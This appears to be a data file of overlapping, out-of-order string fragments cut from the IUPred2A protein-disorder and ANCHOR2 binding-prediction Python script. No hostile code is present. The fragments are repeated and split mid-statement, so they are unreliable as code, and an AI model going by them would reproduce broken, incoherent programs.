"weighted_energy_score[idx] /= len(range(idx - wc, idx + wc + 1)) else: weighted_energy_score =",
"freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx]",
"else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]),",
"sequence in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result",
"= smooth(unweighted_energy_score, wc) glob_text = \"\" if mode == 'glob': gr = []",
"len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] * len(seq) for idx",
"for pos, residue in enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a'",
"in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score = [0]",
"(len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] *",
"wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\" if mode",
"histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100 wc = 10",
"freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] += 0 for",
"idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] <",
"= [0] * len(seq) interface_energy_score = [0] * len(seq) energy_gain = [0] *",
"'glob']: sys.exit('Wrong iupred2 option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters",
"read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score =",
"len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx -",
"and not in_gr: beg = idx end = idx in_gr = True if",
"in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result =",
"freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc",
"+ lc + 1:idx + uc + 1]) for aa, freq in freq_dct.items():",
"print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as a function of redox state",
"/ (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0]",
"KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in range(len(seq)): for",
"return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for",
"if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')):",
"for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx]",
"float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) /",
"range(0, len(res), 10)]) glob_text += \"Number of globular domains: {}\\n\".format(len(mgr)) for n, i",
"hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\") as",
"\".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text += \"Number of",
"= read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn:",
"unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode ==",
"41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013 par_b = 0.26",
"sign = 1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign =",
"directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if",
"_freq.items(): _freq[_aa] = _ins / len(_seq) return _freq def read_matrix(matrix_file): _mtx = {}",
"weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx",
"= 0.0013 par_b = 0.26 par_c = 0.43 iupred_limit = par_c - (par_a",
"+= 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain =",
"idx2 in range(idx - wc, idx + wc + 1): if idx2 <",
"= sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx]",
"\"Number of globular domains: {}\\n\".format(len(mgr)) for n, i in enumerate(mgr): glob_text += \"",
"iupred_scores): local_window_size = 41 iupred_window_size = 30 local_smoothing_window = 5 par_a = 0.0013",
"anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116)))",
"+ 1:idx + uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx]",
"Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple",
"lc = 1 uc = 100 wc = 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo,",
"directory not found at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d')",
"enumerate(sequence): print('{}\\t{}\\t{:.4f}'.format(pos + 1, residue, iupred2_result[0][pos]), end=\"\") if '-a' in sys.argv: print(\"\\t{:.4f}\".format(anchor2_res[pos]), end=\"\")",
"Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) #",
"in _freq: _freq[_aa] += 1 else: _freq[_aa] = 1 for _aa, _ins in",
"25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH))",
"= sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at",
"= par_c - (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with",
"100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH))",
"[0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0,",
"local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] *",
"if val > 0.3 and not in_gr: beg = idx end = idx",
"+ 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try: local_energy_score[idx]",
"+ seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:] res",
"- beg + 1 < 35: k += 1 if k < nr:",
"+= seq[nr:] res = \" \".join([res[i:i + 10] for i in range(0, len(res),",
"h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step =",
"in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] +",
"0.26 par_c = 0.43 iupred_limit = par_c - (par_a / par_b) mtx =",
"return sum(lst) / len(lst) def aa_freq(_seq): _freq = {} for _aa in _seq:",
"data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg)",
"histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size = 30",
"\\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2: sys.exit(help_msg) if not os.path.isfile(sys.argv[-2]):",
"<NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction",
"= SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence identifier for",
"i[1] + 1 res += seq[nr:] res = \" \".join([res[i:i + 10] for",
"+ 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in",
"if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] =",
"= 10 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score =",
"val <= histo_min + 2 * histo_step: iupred_score[idx] = 1 elif val >=",
"else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist =",
"# <NAME>, <NAME>, <NAME> # Nucleic Acids Research 2018;46(W1):W329-W337. # # Prediction type:",
"mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx]",
"len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b and",
"+ uc + 1]) for aa, freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa]",
"[0] * len(seq) energy_gain = [0] * len(seq) for idx in range(len(seq)): freq_dct",
"+= mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short':",
"- local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1])",
"with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score =",
"window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\"",
"val <= 0.3: gr.append({0: beg, 1: end}) in_gr = False elif in_gr: end",
"'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short',",
"return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile) (iupred type)",
"in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip() return _seq def iupred(seq, mode):",
"continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) > h_max: h_max",
"def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler:",
"open(fasta_file) as file_handler: for _line in file_handler: if _line.startswith(\">\"): continue _seq += _line.strip()",
"= \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper()",
"= False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if",
"beg, 1: end}) in_gr = False elif in_gr: end += 1 if val",
"mode): if mode == \"short\": lc = 1 uc = 25 wc =",
"[0] * len(seq) iupred_score = [0] * len(seq) for idx in range(len(seq)): freq_dct",
"individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a'",
"histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc = 100",
"< par_b and iupred_scores[idx] < par_c: sign = -1 corr = 0 if",
"os.path.isfile(sys.argv[-2]): sys.exit('Input sequence file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data",
"SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences: # Print individual sequence identifier for posterior",
"= read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc = 1 uc",
"i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val",
"= 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return",
"gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k = kk kk",
"end < 45: beg = gr[k][0] end = gr[kk][1] kk += 1 elif",
"1: end}) mgr = [] k = 0 kk = k + 1",
"idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] +",
"k < nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1:",
"+ math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__))",
"10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode ==",
"nr = 0 res = \"\" for i in mgr: res += seq[nr:i[0]]",
"= [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score = [0] *",
"* len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx",
"[] k = 0 kk = k + 1 if gr: beg =",
"1 if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr",
"_fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else:",
"in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)])",
"True if in_gr: gr.append({0: beg, 1: end}) mgr = [] k = 0",
"\"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr",
"\" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text += \"Number",
"- 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options) (seqfile)",
"at {}!\\n{}'.format(PATH, help_msg)) if '-d' in sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if",
"> iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c))",
"weighted_energy_score = [0] * len(seq) iupred_score = [0] * len(seq) for idx in",
"for aa, freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError:",
"Options \\t-d str - Location of data directory (default='./') \\t-a - Enable ANCHOR2",
"option {}!\\n{}'.format(sys.argv[-1], help_msg)) # Print output message with run parameters print(\"\"\"# IUPred2A: context-dependent",
"par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as _fn: for line",
"Research 2018;46(W1):W329-W337. # # Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO",
"* len(seq) for idx in range(len(seq)): sign = 1 if energy_gain[idx] < par_b",
"sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] == 'long': anchor2_res = anchor2(sequence, iupred2_result[0])",
"domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res,",
"{}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70))",
"(1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores): local_window_size = 41 iupred_window_size",
"freq in freq_dct.items(): try: local_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: local_energy_score[idx] +=",
"histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc = 100",
"par_c) anchor_score[idx] = 1 / (1 + math.e ** (-22.97968 * (anchor_score[idx] -",
"\"fasta\") for sequence in sequences: # Print individual sequence identifier for posterior parsing",
"for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min =",
"Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support multiple sequences analysis simultaneously sequences",
"idx2 >= len(seq): weighted_energy_score[idx] += -1.26 else: weighted_energy_score[idx] += unweighted_energy_score[idx2] weighted_energy_score[idx] /= len(range(idx",
"if mode == \"short\": lc = 1 uc = 25 wc = 10",
"for sequence in sequences: # Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\")",
"= 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"+ 1): if idx2 < 0 or idx2 >= len(seq): weighted_energy_score[idx] += -1.26",
"i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if",
"read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\") with open(histo_file, \"r\")",
"glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx, val in enumerate(weighted_energy_score): if val <= histo_min",
"= gr[kk][1] kk += 1 elif end - beg + 1 < 35:",
"freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] += 0 if",
"range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - local_window_size):max(0, idx - 1)] + seq[idx +",
"at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in ['short', 'long', 'glob']: sys.exit('Wrong iupred2 option",
"_line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2])",
"if _line.startswith(\"#\"): continue if float(_line.split()[1]) < h_min: h_min = float(_line.split()[1]) if float(_line.split()[1]) >",
"if mode == 'glob': gr = [] in_gr = False beg, end =",
"k += 1 if k < nr: beg = gr[k][0] end = gr[k][1]",
"\"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue if float(_line.split()[1]) <",
"= gr[0][1] nr = len(gr) while k < nr: if kk < nr",
"for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx - uc):max(0, idx - lc)]",
"histo[int((weighted_energy_score[idx] - histo_min) * (1 / histo_step))] return iupred_score, glob_text def anchor2(seq, iupred_scores):",
"local_window_size):max(0, idx - 1)] + seq[idx + 2:idx + local_window_size + 1]) for",
"= local_energy_score[idx] - interface_energy_score[idx] iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window)",
"parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if '-a' in sys.argv: if sys.argv[-1] ==",
"(h_max - h_min) / (len(hist)) return hist, h_min, h_max, h_step def smooth(energy_list, window):",
"< nr and gr[kk][0] - end < 45: beg = gr[k][0] end =",
"_fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]]",
"support multiple sequences analysis simultaneously sequences = SeqIO.parse(sys.argv[-2], \"fasta\") for sequence in sequences:",
"anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if '-a' in sys.argv: print(\"#",
">= histo_max - 2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx]",
"+= 0 if mode == 'short': for idx in range(len(seq)): for idx2 in",
"False beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr",
"function of redox state and protein binding # <NAME>, <NAME>, <NAME> # Nucleic",
"iupred2_result[0]) else: anchor2_res = anchor2(sequence, iupred(sequence, 'long')[0]) if sys.argv[-1] == 'glob': print(iupred2_result[1]) if",
"# Prediction type: {} # Prediction output\"\"\".format(sys.argv[-1])) # Add SeqIO parser to support",
"enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1]",
"-float(\"inf\") with open(histo_file, \"r\") as fnh: for _line in fnh: if _line.startswith(\"#\"): continue",
"histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc =",
"= 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step =",
"2 * histo_step: iupred_score[idx] = 0 else: iupred_score[idx] = histo[int((weighted_energy_score[idx] - histo_min) *",
"+= _line.strip() return _seq def iupred(seq, mode): if mode == \"short\": lc =",
"output message with run parameters print(\"\"\"# IUPred2A: context-dependent prediction of protein disorder as",
"seq[idx + 2:idx + local_window_size + 1]) for aa, freq in freq_dct.items(): try:",
"15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/long_histogram\".format(PATH)) else: lc =",
"iupred_scores = smooth(iupred_scores, iupred_window_size) energy_gain = smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] *",
"elif end - beg + 1 < 35: k += 1 if k",
"idx - lc)] + seq[idx + lc + 1:idx + uc + 1])",
"- par_c)) + par_b anchor_score[idx] = sign * (energy_gain[idx] + corr - par_b)",
"= 1 uc = 100 wc = 15 mtx = read_matrix(\"{}/data/iupred2_long_energy_matrix\".format(PATH)) histo, histo_min,",
"idx + wc + 1)) else: weighted_energy_score = smooth(unweighted_energy_score, wc) glob_text = \"\"",
"+ 1].upper() nr = i[1] + 1 res += seq[nr:] res = \"",
"* freq except KeyError: interface_energy_score[idx] += 0 energy_gain[idx] = local_energy_score[idx] - interface_energy_score[idx] iupred_scores",
"_mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = []",
"file not found at {}!\\n{}'.format(sys.argv[-2], help_msg)) if not os.path.isdir(PATH): sys.exit('Data directory not found",
"as a function of redox state and protein binding # <NAME>, <NAME>, <NAME>",
"in _mtx: _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) else: _mtx[_line.split()[0]] = {} _mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return",
"= read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc",
"nr: beg = gr[k][0] end = gr[k][1] seq = seq.lower() nr = 0",
"globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0] + 1, i[1] + 1) glob_text +=",
"res = \" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text",
"for line in _fn: interface_comp[line.split()[1]] = float(line.split()[2]) local_energy_score = [0] * len(seq) interface_energy_score",
"len(gr) while k < nr: if kk < nr and gr[kk][0] - end",
"nr: beg = gr[k][0] end = gr[k][1] else: mgr.append({0: beg, 1: end}) k",
"_freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as _fhm: for _line",
"_mtx[_line.split()[0]][_line.split()[1]] = float(_line.split()[2]) return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\")",
"= float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist)) return hist, h_min,",
"seq[nr:i[0]] + seq[i[0]:i[1] + 1].upper() nr = i[1] + 1 res += seq[nr:]",
"smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in range(len(energy_list)): weighted_energy_score[idx] =",
"{} with open(matrix_file, \"r\") as _fhm: for _line in _fhm: if _line.split()[0] in",
"\"r\") as _fhm: for _line in _fhm: if _line.split()[0] in _mtx: _mtx[_line.split()[0]][_line.split()[1]] =",
"> h_max: h_max = float(_line.split()[1]) hist.append(float(_line.split()[-1])) h_step = (h_max - h_min) / (len(hist))",
"aa_freq(seq[max(0, idx - uc):max(0, idx - lc)] + seq[idx + lc + 1:idx",
"res = \"\" for i in mgr: res += seq[nr:i[0]] + seq[i[0]:i[1] +",
"Print individual sequence identifier for posterior parsing print(f\">{sequence.id}\") iupred2_result = iupred(sequence, sys.argv[-1]) if",
"1)] + seq[idx + 2:idx + local_window_size + 1]) for aa, freq in",
"sign * (energy_gain[idx] + corr - par_b) * (iupred_scores[idx] - par_c) anchor_score[idx] =",
"end}) k = kk kk += 1 if k < nr: beg =",
"+= 1 if k < nr: beg = gr[k][0] end = gr[k][1] seq",
"h_max, h_step def smooth(energy_list, window): weighted_energy_score = [0] * len(energy_list) for idx in",
"math.e ** (-22.97968 * (anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg",
"\"short\": lc = 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH))",
"= 0 kk = k + 1 if gr: beg = gr[0][0] end",
"in_gr: beg = idx end = idx in_gr = True if in_gr: gr.append({0:",
"and iupred_scores[idx] < par_c: sign = -1 corr = 0 if iupred_scores[idx] >",
"if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1]",
"aa, freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx]",
"1, i[0] + 1, i[1] + 1) glob_text += \"\\n\".join(textwrap.wrap(res, 70)) for idx,",
"return _mtx def read_histo(histo_file): hist = [] h_min = float(\"inf\") h_max = -float(\"inf\")",
"beg, end = 0, 0 for idx, val in enumerate(weighted_energy_score): if in_gr and",
"beg + 1 < 35: k += 1 if k < nr: beg",
"sys import textwrap import math import os from Bio import SeqIO def avg(lst):",
"if energy_gain[idx] < par_b and iupred_scores[idx] < par_c: sign = -1 corr =",
"beg = gr[k][0] end = gr[kk][1] kk += 1 elif end - beg",
"freq except KeyError: unweighted_energy_score[idx] += 0 if mode == 'short': for idx in",
"else: mgr.append({0: beg, 1: end}) k = kk kk += 1 if k",
"read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode == 'glob': lc = 1 uc = 100 wc =",
"mgr = [] k = 0 kk = k + 1 if gr:",
"sys.argv: PATH = sys.argv[sys.argv.index('-d') + 1] if not os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not",
"= 1 elif val >= histo_max - 2 * histo_step: iupred_score[idx] = 0",
"(anchor_score[idx] - 0.0116))) return anchor_score PATH = os.path.dirname(os.path.realpath(__file__)) help_msg = \"\"\"Usage: {} (options)",
"\\t-d str - Location of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0])",
"prediction of protein disorder as a function of redox state and protein binding",
"weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window + 1)]) return weighted_energy_score",
"for idx in range(len(energy_list)): weighted_energy_score[idx] = avg(energy_list[max(0, idx - window):min(len(energy_list), idx + window",
"+ window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file)",
"= \"\" if mode == 'glob': gr = [] in_gr = False beg,",
"+= 1 elif end - beg + 1 < 35: k += 1",
"freq in freq_dct.items(): try: unweighted_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: unweighted_energy_score[idx] +=",
"= [0] * len(seq) for idx in range(len(seq)): freq_dct = aa_freq(seq[max(0, idx -",
"* freq except KeyError: local_energy_score[idx] += 0 for aa, freq in interface_comp.items(): try:",
"os from Bio import SeqIO def avg(lst): return sum(lst) / len(lst) def aa_freq(_seq):",
"window + 1)]) return weighted_energy_score def read_seq(fasta_file): _seq = \"\" with open(fasta_file) as",
"n, i in enumerate(mgr): glob_text += \" globular domain {}.\\t{}-{}\\n\".format(n + 1, i[0]",
"= k + 1 if gr: beg = gr[0][0] end = gr[0][1] nr",
"val in enumerate(weighted_energy_score): if val <= histo_min + 2 * histo_step: iupred_score[idx] =",
"of data directory (default='./') \\t-a - Enable ANCHOR2 predition\\n\"\"\".format(sys.argv[0]) if len(sys.argv) < 2:",
"freq in interface_comp.items(): try: interface_energy_score[idx] += mtx[seq[idx]][aa] * freq except KeyError: interface_energy_score[idx] +=",
"= 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min,",
"kk < nr and gr[kk][0] - end < 45: beg = gr[k][0] end",
"elif in_gr: end += 1 if val > 0.3 and not in_gr: beg",
"gr[0][1] nr = len(gr) while k < nr: if kk < nr and",
"/ len(_seq) return _freq def read_matrix(matrix_file): _mtx = {} with open(matrix_file, \"r\") as",
"= \" \".join([res[i:i + 10] for i in range(0, len(res), 10)]) glob_text +=",
"gr[0][0] end = gr[0][1] nr = len(gr) while k < nr: if kk",
"iupred_limit and energy_gain[idx] < 0: corr = (par_a / (iupred_scores[idx] - par_c)) +",
"= read_histo(\"{}/data/long_histogram\".format(PATH)) unweighted_energy_score = [0] * len(seq) weighted_energy_score = [0] * len(seq) iupred_score",
"- (par_a / par_b) mtx = read_matrix('{}/data/anchor2_energy_matrix'.format(PATH)) interface_comp = {} with open('{}/data/anchor2_interface_comp'.format(PATH)) as",
"read_seq(fasta_file): _seq = \"\" with open(fasta_file) as file_handler: for _line in file_handler: if",
"print(iupred2_result[1]) if '-a' in sys.argv: print(\"# POS\\tRES\\tIUPRED2\\tANCHOR2\") else: print(\"# POS\\tRES\\tIUPRED2\") for pos, residue",
"os.path.isdir(os.path.join(PATH, 'data')): sys.exit('Data directory not found at {}!\\n{}'.format(PATH, help_msg)) if sys.argv[-1] not in",
"= seq.lower() nr = 0 res = \"\" for i in mgr: res",
"def iupred(seq, mode): if mode == \"short\": lc = 1 uc = 25",
"lc = 1 uc = 25 wc = 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo,",
"gr[k][0] end = gr[kk][1] kk += 1 elif end - beg + 1",
"* histo_step: iupred_score[idx] = 1 elif val >= histo_max - 2 * histo_step:",
"= smooth(smooth(energy_gain, local_smoothing_window), local_smoothing_window) anchor_score = [0] * len(seq) for idx in range(len(seq)):",
"= 10 mtx = read_matrix(\"{}/data/iupred2_short_energy_matrix\".format(PATH)) histo, histo_min, histo_max, histo_step = read_histo(\"{}/data/short_histogram\".format(PATH)) elif mode",
